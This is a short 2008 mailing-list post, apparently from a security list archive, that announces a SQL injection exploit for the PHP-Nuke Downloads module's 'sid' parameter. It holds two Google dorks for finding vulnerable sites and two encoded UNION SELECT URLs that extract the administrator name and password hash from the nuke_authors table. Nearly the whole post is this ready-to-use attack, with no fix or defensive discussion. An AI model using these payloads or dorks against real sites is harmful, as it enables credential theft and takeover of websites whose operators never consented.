PHP-Nuke Module Downloads SQL Injection(sid)

hackturkiye . hackturkiye Thu, 21 Feb 2008 10:50:15 -0800

###############################################################

#


#   PHP-Nuke Module Downloads SQL Injection(sid)

#

###############################################################

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME : http://www.milw0rm.com/author/1334

#   

# MA&#304;L : [EMAIL PROTECTED]

#        

################################################################

# 

#  DORK 1 : allinurl: sid "modules php name Downloads"

# 

#  DORK 2 : allinurl: sid"d_op=viewsdownload"

#

################################################################

   EXPLOIT : 


admin =


modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202


pass=


modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202


################################################################

# [EMAIL PROTECTED]           i AM NOT HACKER      [EMAIL PROTECTED] 

################################################################

PHP-Nuke Module Downloads SQL Injection(sid)

Reply via email to